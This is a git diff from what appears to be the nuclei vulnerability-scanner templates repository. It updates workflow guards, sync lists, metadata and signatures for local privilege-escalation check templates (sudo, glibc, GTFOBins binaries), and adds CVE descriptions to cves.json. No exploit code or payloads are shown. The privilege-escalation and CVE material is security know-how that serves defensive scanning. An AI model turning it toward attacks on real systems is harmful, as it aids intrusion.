Merge branch 'main' into add-missing-token

.github/workflows/cache-purge.yml

@@ -1,22 +0,0 @@
-name: 🗑️ Cache Purge
-
-on:
-  push:
-    tags:
-      - '*'
-  workflow_dispatch:
-
-jobs:
-  deploy:
-    runs-on: ubuntu-latest
-    if: github.repository == 'projectdiscovery/nuclei-templates'
-    steps:
-      # Wait for 5 minutes
-      - name: Wait for 2 minutes
-        run: sleep 120
-
-      - name: Purge cache
-        uses: jakejarvis/cloudflare-purge-action@master
-        env:
-          CLOUDFLARE_ZONE: ${{ secrets.CLOUDFLARE_ZONE }}
-          CLOUDFLARE_TOKEN: ${{ secrets.CLOUDFLARE_TOKEN }}

.github/workflows/syntax-checking.yml

@@ -9,6 +9,7 @@ on:
 jobs:
   build:
     runs-on: ubuntu-latest
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     steps:
       - uses: actions/checkout@v4
       - name: Yamllint

.github/workflows/template-sign.yml

@@ -11,6 +11,7 @@ on:
 jobs:
   build:
     runs-on: ubuntu-latest
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     steps:
       - uses: actions/checkout@v4
         with: 

.github/workflows/template-validate.yml

@@ -9,6 +9,7 @@ on:
 jobs:
   build:
     runs-on: ubuntu-latest
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     steps:
       - uses: actions/checkout@v4
         with: 

.github/workflows/templates-stats.yml

@@ -9,6 +9,7 @@ on:
 jobs:
   build:
     runs-on: ubuntu-latest
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     steps:
       - uses: actions/checkout@v4
         with: 

.github/workflows/templates-sync.yml

@@ -9,6 +9,7 @@ on:
     - 'http/cves/2023/CVE-2023-42344.yaml'
     - 'http/cves/2023/CVE-2023-45671.yaml'
     - 'http/cves/2023/CVE-2023-48777.yaml'
+    - 'http/cves/2023/CVE-2023-6895.yaml'
     - 'http/cves/2024/CVE-2024-0305.yaml'
     - 'http/cves/2024/CVE-2024-0713.yaml'
     - 'http/cves/2024/CVE-2024-1021.yaml'
@@ -25,7 +26,9 @@ on:
     - 'http/default-logins/ibm/ibm-dcec-default-login.yaml'
     - 'http/default-logins/ibm/ibm-dsc-default-login.yaml'
     - 'http/default-logins/ibm/ibm-hmc-default-login.yaml'
+    - 'http/default-logins/ibm/imm-default-login.yaml'
     - 'http/exposed-panels/c2/meduza-stealer.yaml'
+    - 'http/exposed-panels/cisco-unity-panel.yaml'
     - 'http/exposed-panels/connectwise-panel.yaml'
     - 'http/exposed-panels/fortinet/fortiauthenticator-detect.yaml'
     - 'http/exposed-panels/ibm/ibm-dcec-panel.yaml'
@@ -38,6 +41,7 @@ on:
     - 'http/exposed-panels/opinio-panel.yaml'
     - 'http/exposed-panels/rocketchat-panel.yaml'
     - 'http/exposures/configs/sphinxsearch-config.yaml'
+    - 'http/misconfiguration/cloudflare-rocketloader-htmli.yaml'
     - 'http/misconfiguration/installer/connectwise-setup.yaml'
     - 'http/technologies/ibm/ibm-decision-runner.yaml'
     - 'http/technologies/ibm/ibm-decision-server-runtime.yaml'
@@ -49,6 +53,7 @@ on:
   workflow_dispatch:
 jobs:
   triggerRemoteWorkflow:
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     runs-on: ubuntu-latest
     steps:
     - name: Trigger Remote Workflow with curl

.github/workflows/wordpress-plugins-update.yml

@@ -6,6 +6,7 @@ on:
 jobs:
   Update:
     runs-on: ubuntu-latest
+    if: github.repository == 'projectdiscovery/nuclei-templates'
     steps:
       - name: Check out repository code
         uses: actions/checkout@v4

.new-additions

@@ -4,6 +4,7 @@ http/cves/2023/CVE-2023-38203.yaml
 http/cves/2023/CVE-2023-42344.yaml
 http/cves/2023/CVE-2023-45671.yaml
 http/cves/2023/CVE-2023-48777.yaml
+http/cves/2023/CVE-2023-6895.yaml
 http/cves/2024/CVE-2024-0305.yaml
 http/cves/2024/CVE-2024-0713.yaml
 http/cves/2024/CVE-2024-1021.yaml
@@ -20,7 +21,9 @@ http/default-logins/ibm/ibm-dcbc-default-login.yaml
 http/default-logins/ibm/ibm-dcec-default-login.yaml
 http/default-logins/ibm/ibm-dsc-default-login.yaml
 http/default-logins/ibm/ibm-hmc-default-login.yaml
+http/default-logins/ibm/imm-default-login.yaml
 http/exposed-panels/c2/meduza-stealer.yaml
+http/exposed-panels/cisco-unity-panel.yaml
 http/exposed-panels/connectwise-panel.yaml
 http/exposed-panels/fortinet/fortiauthenticator-detect.yaml
 http/exposed-panels/ibm/ibm-dcec-panel.yaml
@@ -33,6 +36,7 @@ http/exposed-panels/openvas-panel.yaml
 http/exposed-panels/opinio-panel.yaml
 http/exposed-panels/rocketchat-panel.yaml
 http/exposures/configs/sphinxsearch-config.yaml
+http/misconfiguration/cloudflare-rocketloader-htmli.yaml
 http/misconfiguration/installer/connectwise-setup.yaml
 http/technologies/ibm/ibm-decision-runner.yaml
 http/technologies/ibm/ibm-decision-server-runtime.yaml

.nuclei-ignore

@@ -32,3 +32,6 @@ files:
   - http/cves/2020/CVE-2020-28351.yaml
   - http/vulnerabilities/oracle/oracle-ebs-xss.yaml
   - http/cves/2021/CVE-2021-28164.yaml
+  - http/fuzzing/wordpress-themes-detect.yaml
+  - http/fuzzing/mdb-database-file.yaml
+  - http/fuzzing/iis-shortname.yaml

code/cves/2019/CVE-2019-14287.yaml

@@ -9,11 +9,22 @@ info:
   reference:
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14287
     - https://www.exploit-db.com/exploits/47502
+    - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00042.html
+    - http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00047.html
+    - http://packetstormsecurity.com/files/154853/Slackware-Security-Advisory-sudo-Updates.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2019-14287
+    cwe-id: CWE-755
+    epss-score: 0.34299
+    epss-percentile: 0.96958
+    cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
   metadata:
     verified: true
     max-request: 2
-    vendor: canonical
+    vendor: sudo_project
-    product: ubuntu_linux
+    product: sudo
   tags: cve,cve2019,sudo,code,linux,privesc,local,canonical
 
 self-contained: true
@@ -36,4 +47,4 @@ code:
           - '!contains(code_1_response, "root")'
           - 'contains(code_2_response, "root")'
         condition: and
-# digest: 4b0a00483046022100f4f8e722b5f42a0123c6f1f8f54ac645f9d05fcd3cfef40c38b610291978a5e00221009d44ff15e4eea65e3fcb18aeece52355879b009f9a7246c145abdaf23807e2ea:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402205d953c6f0c1352f39f1035d518dc38cffe2165dfb1f4ddd270434e7dbb790c1102200423935d03c0eafff4702b083c0d5da821affb591901209cd6d087644114abdf:922c64590222798bb761d5b6d8e72950

code/cves/2021/CVE-2021-3156.yaml

@@ -10,8 +10,20 @@ info:
     - https://medium.com/mii-cybersec/privilege-escalation-cve-2021-3156-new-sudo-vulnerability-4f9e84a9f435
     - https://blog.qualys.com/vulnerabilities-threat-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit
     - https://infosecwriteups.com/baron-samedit-cve-2021-3156-tryhackme-76d7dedc3cff
+    - http://packetstormsecurity.com/files/161160/Sudo-Heap-Based-Buffer-Overflow.html
+    - http://packetstormsecurity.com/files/176932/glibc-syslog-Heap-Based-Buffer-Overflow.html
+  classification:
+    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.8
+    cve-id: CVE-2021-3156
+    cwe-id: CWE-193
+    epss-score: 0.97085
+    epss-percentile: 0.99752
+    cpe: cpe:2.3:a:sudo_project:sudo:*:*:*:*:*:*:*:*
   metadata:
     verified: true
+    vendor: sudo_project
+    product: sudo
   tags: cve,cve2021,sudo,code,linux,privesc,local,kev
 
 self-contained: true
@@ -28,4 +40,4 @@ code:
           - "malloc(): memory corruption"
           - "Aborted (core dumped)"
         condition: and
-# digest: 490a00463044022074b8ca1a10aca438432f3b6e55023b9c80357eb5a6f2ac795774b7d44e85188e02201a3af75f86a975548121afe1ab1faf6ade2d1e89d05200b4e6990e97af56af36:922c64590222798bb761d5b6d8e72950
+# digest: 490a004630440220494a1c88897c9697f8d55a15b5ba0990a64225974efa03ca485ae5ebe4c2bcf0022019eb5fcd9dd61429f3964b64b263aec23e0193b30d695284d275818b9c38812d:922c64590222798bb761d5b6d8e72950

code/cves/2023/CVE-2023-2640.yaml

@@ -21,8 +21,8 @@ info:
     cvss-score: 7.8
     cve-id: CVE-2023-2640
     cwe-id: CWE-863
-    epss-score: 0.00047
+    epss-score: 0.00174
-    epss-percentile: 0.14754
+    epss-percentile: 0.53697
     cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
   metadata:
     verified: true
@@ -54,4 +54,4 @@ code:
           - '!contains(code_1_response, "(root)")'
           - 'contains(code_2_response, "(root)")'
         condition: and
-# digest: 4a0a00473045022100a20c4d30517d6bd96f1a97d3fca9e29bd1f686eeb9192a3f503a5bddffeda9fe022020188e4f25e79706197eab61598d64679c02828a0aedf7f496b5fbe14707ec90:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100b7d65ed4d77da164c62392e9367361cd521cd12c1746e27d4865c7913b4250910220243bd991082f86b48587a9ec336c51a545db1464e12ebbbfc0ee5128bc2cb27f:922c64590222798bb761d5b6d8e72950

code/cves/2023/CVE-2023-4911.yaml

@@ -10,16 +10,21 @@ info:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-4911
     - https://www.qualys.com/2023/10/03/cve-2023-4911/looney-tunables-local-privilege-escalation-glibc-ld-so.txt
     - https://www.youtube.com/watch?v=1iV-CD9Apn8
+    - http://www.openwall.com/lists/oss-security/2023/10/05/1
+    - http://www.openwall.com/lists/oss-security/2023/10/13/11
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.8
     cve-id: CVE-2023-4911
-    cwe-id: CWE-787
+    cwe-id: CWE-787,CWE-122
-    cpe: cpe:2.3:a:gnu:glibc:-:*:*:*:*:*:*:*
+    epss-score: 0.0171
+    epss-percentile: 0.87439
+    cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
   metadata:
     max-request: 1
-    vendor: glibc
+    vendor: gnu
-  tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local
+    product: glibc
+  tags: cve,cve2023,code,glibc,looneytunables,linux,privesc,local,kev
 
 self-contained: true
 code:
@@ -34,4 +39,4 @@ code:
       - type: word
         words:
           - "139"     # Segmentation Fault Exit Code
-# digest: 4a0a004730450220420ab1d35c89225b917a344669e743fa83b79698910c4f87a5124f2dfaae54cd022100d122ece9eaba7f9bfc32d229e79d56b127da02ce4e5cf4034ecebfd9da56a9a2:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100f0ab74cd6ae5323c4a571e6c858cbbb8ced3b3b2b8dbb8d8c65b380a03a28f8302203aced1de4878bced98bb7d6bd296b9187a2d4795325e1f62debb338f363295f5:922c64590222798bb761d5b6d8e72950

code/cves/2023/CVE-2023-6246.yaml

@@ -9,15 +9,21 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-6246
     - https://www.qualys.com/2024/01/30/cve-2023-6246/syslog.txt
+    - https://access.redhat.com/security/cve/CVE-2023-6246
+    - https://bugzilla.redhat.com/show_bug.cgi?id=2249053
+    - https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D2FIH77VHY3KCRROCXOT6L27WMZXSJ2G/
   classification:
     cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.8
     cve-id: CVE-2023-6246
-    cwe-id: CWE-787
+    cwe-id: CWE-787,CWE-122
+    epss-score: 0.00383
+    epss-percentile: 0.72435
     cpe: cpe:2.3:a:gnu:glibc:*:*:*:*:*:*:*:*
   metadata:
     max-request: 1
-    vendor: glibc
+    vendor: gnu
+    product: glibc
   tags: cve,cve2023,code,glibc,linux,privesc,local
 
 self-contained: true
@@ -33,4 +39,4 @@ code:
       - type: word
         words:
           - "127"     # Segmentation Fault Exit Code
-# digest: 4a0a00473045022100fec914f6ee85b53ab611e26476cba7da42e11cdcb33c935a2d003c74c7312b1302207b65c84f8435932f1aa050019f6aaf899442187cf9630df934cf9086bd94a2f6:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100816db78414b7bafd0437ce9725201733ffd4c96f285f1cdbe48e08e348e67372022040042ed5d64ab0b2bc48789dd519af760226f155f1764ee76b460937ee89a839:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-choom.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/choom/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,choom,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4a0a0047304502203b1238ca7d9be64f51e9162022deaf76b02898053cbb3511377e76228d3d79ef0221008b6aa349a17b0a16a0d0949f1797c8e111d2498185b88fe99c326c60c59167c9:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100cd0a7dc9b51ef8f3f850d3fde75e025e13c61b464ac044825ac70107c66db1de0220290c09bd78a4e25f5cabc659f9441a3c168a1ca2c226f0ddf9316de01eb30461:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-find.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/find/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,find,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4b0a0048304602210093227e768a659e1747e4dd5d82e25ade3f152549f159b967327082c90677fc5e022100ba7d7a12344d88ac9ec3c0832b25af9d1ef25fe4470e6963b2f3ae814c844e89:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402207f55b1ac220ad114cf5cd2341a388a3860f134489b662ff708d8553b7156207a02201bddad6e9a46aa5b077f01de8b269b2797007741d8c6f38b9ddc7724462497e5:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-lua.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/lua/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,lua,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4a0a00473045022033fd3387c3085b4f8e3a7ced68a4e324ba82f7e683a8c29e5ab32c1975a8fe4b02210097eb732caf95609123a361436265388bba8c2c95fcba6ddaf6504d3a5b19c19f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202ed356f302529ce69de66a24987b78693c5d679a4340425ad29a76fa63db81ab022100a1157d5ab30c98ef4366d8cba600703686a43211b15ce7d17e4fc07a79db5a8f:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-mysql.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/mysql/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,mysql,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4b0a00483046022100fa6772f8e48a5c9ac87ddba3ecc262a59d16d9cba527623da8f5cdf9509e44880221008cff1c5a77c27a1f59d943884498c8d1499da98e6ecf7e1d63851de4ae9fa76c:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502205cfddd58041ea672c83a850b34e77b9b635e71f934118d2a1ab9ab3ca660e13b022100eec2e1232af1d0b4686fc284278197db41fa3a289488abb2936a1186b85e3e26:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-node.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/node/
   metadata:
-    max-request: 4
     verified: true
+    max-request: 4
   tags: code,linux,node,privesc,local
 
 self-contained: true
@@ -53,4 +53,4 @@ code:
           - 'contains(code_3_response, "root")'
           - 'contains(code_4_response, "root")'
         condition: or
-# digest: 4b0a00483046022100e32f25ba4a83d9d265aa187532f0090ba2fdf1beb89235113b4caeed36413ac30221008ecd529618da3ad2ed65e939b4233529614a005b87fd760bbeeb95de2e78746f:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a00483046022100c2fb7e0f1c8874aa30b7cbf614269bbd607e7679a738d4e4b6e6d5cafdf8faa1022100af88ace2a97d251334aeefafdfbd07471443304b4505d49f1edf432f53b5e43a:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-rc.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/rc/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,rc,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4a0a004730450220665e08a8d241b76abc6c9f908b6c953eeebccc153af1c165958c388f1a57c3eb02210091d8e2364f4c48b2fd9d8b64222760ce398677386e5d185fc86425ea5ed10527:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202a315bdc26f4d35efa4a6f698d5324b05e6f7d849772f27996dd0e04ac0edd5b022100cb3566b03c81b4ced70cb1bf221db42da3f9262c3ce4790664bc215a0b623abf:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-run-parts.yaml

@@ -8,8 +8,8 @@ info:
     The run-parts command in Linux is used to run all the executable files in a directory. It is commonly used for running scripts or commands located in a specific directory, such as system maintenance scripts in /etc/cron.daily. The run-parts command provides a convenient way to execute multiple scripts or commands in a batch manner.
   reference: https://gtfobins.github.io/gtfobins/run-parts/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,run-parts,privesc,local
 
 self-contained: true
@@ -45,4 +45,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 490a00463044022055bdbe38258f303b3247dcaaec655d2aca77ff0d5e3d83a8e763840384618a7c02204591a5abce03bc68b647b84a4a4fd59da6d3713256d3494aadc43cf2076778dd:922c64590222798bb761d5b6d8e72950
+# digest: 490a00463044022058411677d700beae571edc83b5da8ff31eaa193dac73ba1515a220842ccabc8d0220151cca60c8ad28b2934984be7d6a187d3dd02ee9cac9a5cc3cd0af97273c6bca:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-strace.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/strace/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,strace,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4a0a004730450221008a56962d3e0bfec8153fae52f4693ee5b8065098d3b7c5e16b5c2f481dcaaeb8022077e7fc1be8079fde76cbf09b10718038a4e013725c9955a91d5b024d02bdd27f:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a0047304502202b121064fdd29dfb40970b3956fcfb830cc7150f895b56913870f21c1f2f5e85022100fd214757ef5ac44a07cfc6fcdcf6da1fe59cd2b44f98829f01fc6af0c58045d8:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-torify.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/torify/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,torify,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 4a0a00473045022100fe967badaa42178c43d6c5f965ebd2205cd5636ddceeece364aedd793b317d1902207ad0bc797b16421928d1ec9016ba53809758b9f7603effab908a27decbc3cc74:922c64590222798bb761d5b6d8e72950
+# digest: 4b0a004830460221008ca7aa24f7f8fa13b8d43c96981d8fd78a382752f6e2c69dfab164443972b747022100d307d8b9c2054d4731db696fc13198afed46d5b1215a6899b56533661240fc91:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-view.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/view/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,view,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 490a0046304402207dc9a1ca06fcde2705d1a72ee2f792eff2f81f5d00def77fa54eec5d7717c19e02200c984a4f0d0cf94baa16c355ab52265f3dd281cac5bdd92f8ef9242efc087166:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022100ed64ed48009962a92006b2ce803d0c5189e91ced727a841bc8c31e5d98d1a9b5022009f19b7df531fecde9b1303555d1ec29ba63a49ca1c439b6f48f46552d2d4bb4:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/binary/privesc-xargs.yaml

@@ -9,8 +9,8 @@ info:
   reference:
     - https://gtfobins.github.io/gtfobins/xargs/
   metadata:
-    max-request: 3
     verified: true
+    max-request: 3
   tags: code,linux,xargs,privesc,local
 
 self-contained: true
@@ -46,4 +46,4 @@ code:
           - 'contains(code_2_response, "root")'
           - 'contains(code_3_response, "root")'
         condition: or
-# digest: 490a0046304402205fac35cdd5142e3afd382d38b77be0b7105cfc23884e7ac5cbba8aa91cfc2bb002202b6c7ebae29c5c300052a85a39f3e30b71788d590bc40b797c1ee96c1f00f267:922c64590222798bb761d5b6d8e72950
+# digest: 4a0a00473045022052f887093022e061b40da1eae5a8b4aa8a5f267dfd5f22db005a9076db73cc9a02210093f126e5d0229cf686f3c547dc3466e89afb2a7bf57bbeb790acf65376fcd047:922c64590222798bb761d5b6d8e72950

code/privilege-escalation/linux/rw-shadow.yaml

@@ -7,8 +7,8 @@ info:
   reference:
     - https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-etc-shadow
   metadata:
-    max-request: 2
     verified: true
+    max-request: 2
   tags: code,linux,privesc,local
 
 self-contained: true
@@ -42,4 +42,4 @@ code:
         words:
           - "Not readable and not writable"
         negative: true
-# digest: 490a004630440220516036fa8622068621421ac043a6fb20b6551a6ca3d7851726474cfff7e4d9f902205a1a9ce09b5827f39e2311e6716793a917e29383f5e4d4a4b9a56925afa68e61:922c64590222798bb761d5b6d8e72950
+# digest: 490a0046304402206152b0b3fe7a164b5583cb921d799f47fdcf9f30da2c32cbbb7248aa7068a13102200b3f49d97a93659dc9f1b56c518921e7e3597478d55eddb1cfc6a76dd45cb968:922c64590222798bb761d5b6d8e72950

cves.json

@@ -265,6 +265,7 @@
 {"ID":"CVE-2015-1427","Info":{"Name":"ElasticSearch - Remote Code Execution","Severity":"high","Description":"ElasticSearch before 1.3.8 and 1.4.x before 1.4.3 allows remote attackers to bypass the sandbox protection mechanism and execute arbitrary shell commands via a crafted script to the Groovy scripting engine.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1427.yaml"}
 {"ID":"CVE-2015-1503","Info":{"Name":"IceWarp Mail Server \u003c11.1.1 - Directory Traversal","Severity":"high","Description":"IceWarp Mail Server versions prior to 11.1.1 suffer from a directory traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-1503.yaml"}
 {"ID":"CVE-2015-1579","Info":{"Name":"WordPress Slider Revolution - Local File Disclosure","Severity":"medium","Description":"Directory traversal vulnerability in the Elegant Themes Divi theme for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the img parameter in a revslider_show_image action to wp-admin/admin-ajax.php. NOTE: this vulnerability may be a duplicate of CVE-2014-9734.\n","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-1579.yaml"}
+{"ID":"CVE-2015-1635","Info":{"Name":"Microsoft Windows 'HTTP.sys' - Remote Code Execution","Severity":"critical","Description":"HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka \"HTTP.sys Remote Code Execution Vulnerability.\"\n","Classification":{"CVSSScore":"10.0"}},"file_path":"http/cves/2015/CVE-2015-1635.yaml"}
 {"ID":"CVE-2015-1880","Info":{"Name":"Fortinet FortiOS \u003c=5.2.3 - Cross-Site Scripting","Severity":"medium","Description":"Fortinet FortiOS 5.2.x before 5.2.3 contains a cross-site scripting vulnerability in the SSL VPN login page which allows remote attackers to inject arbitrary web script or HTML via unspecified vectors.","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2015/CVE-2015-1880.yaml"}
 {"ID":"CVE-2015-20067","Info":{"Name":"WP Attachment Export \u003c 0.2.4 - Unrestricted File Download","Severity":"high","Description":"The plugin does not have proper access controls, allowing unauthenticated users to download the XML data that holds all the details of attachments/posts on a Wordpress\npowered site. This includes details of even privately published posts and password protected posts with their passwords revealed in plain text.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2015/CVE-2015-20067.yaml"}
 {"ID":"CVE-2015-2067","Info":{"Name":"Magento Server MAGMI - Directory Traversal","Severity":"medium","Description":"Magento Server MAGMI (aka Magento Mass Importer) contains a directory traversal vulnerability in web/ajax_pluginconf.php. that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.","Classification":{"CVSSScore":"5"}},"file_path":"http/cves/2015/CVE-2015-2067.yaml"}
@@ -2170,6 +2171,7 @@
 {"ID":"CVE-2023-37728","Info":{"Name":"IceWarp Webmail Server v10.2.1 - Cross Site Scripting","Severity":"medium","Description":"Icewarp Icearp v10.2.1 was discovered to contain a cross-site scripting (XSS) vulnerability via the color parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37728.yaml"}
 {"ID":"CVE-2023-37979","Info":{"Name":"Ninja Forms \u003c 3.6.26 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-37979.yaml"}
 {"ID":"CVE-2023-38035","Info":{"Name":"Ivanti Sentry - Authentication Bypass","Severity":"critical","Description":"A security vulnerability in MICS Admin Portal in Ivanti MobileIron Sentry versions 9.18.0 and below, which may allow an attacker to bypass authentication controls on the administrative interface due to an insufficiently restrictive Apache HTTPD configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38035.yaml"}
+{"ID":"CVE-2023-38203","Info":{"Name":"Adobe ColdFusion Deserialization of Untrusted Data","Severity":"critical","Description":"Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier) are affected by a Deserialization of Untrusted Data vulnerability that could result in Arbitrary code execution. Exploitation of this issue does not require user interaction.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-38203.yaml"}
 {"ID":"CVE-2023-38205","Info":{"Name":"Adobe ColdFusion - Access Control Bypass","Severity":"high","Description":"There is an access control bypass vulnerability in Adobe ColdFusion versions 2023 Update 2 and below, 2021 Update 8 and below and 2018 update 18 and below, which allows a remote attacker to bypass the ColdFusion mechanisms that restrict unauthenticated external access to ColdFusion's Administrator.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-38205.yaml"}
 {"ID":"CVE-2023-3836","Info":{"Name":"Dahua Smart Park Management - Arbitrary File Upload","Severity":"critical","Description":"Dahua wisdom park integrated management platform is a comprehensive management platform, a park operations,resource allocation, and intelligence services,and other functions, including/emap/devicePoint_addImgIco?.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-3836.yaml"}
 {"ID":"CVE-2023-3843","Info":{"Name":"mooDating 1.2 - Cross-site scripting","Severity":"medium","Description":"A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-3843.yaml"}
@@ -2279,14 +2281,17 @@
 {"ID":"CVE-2023-6634","Info":{"Name":"LearnPress \u003c 4.2.5.8 - Remote Code Execution","Severity":"critical","Description":"The LearnPress plugin for WordPress is vulnerable to Command Injection in all versions up to, and including, 4.2.5.7 via the get_content function. This is due to the plugin making use of the call_user_func function with user input. This makes it possible for unauthenticated attackers to execute any public function with one parameter, which could result in remote code execution.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-6634.yaml"}
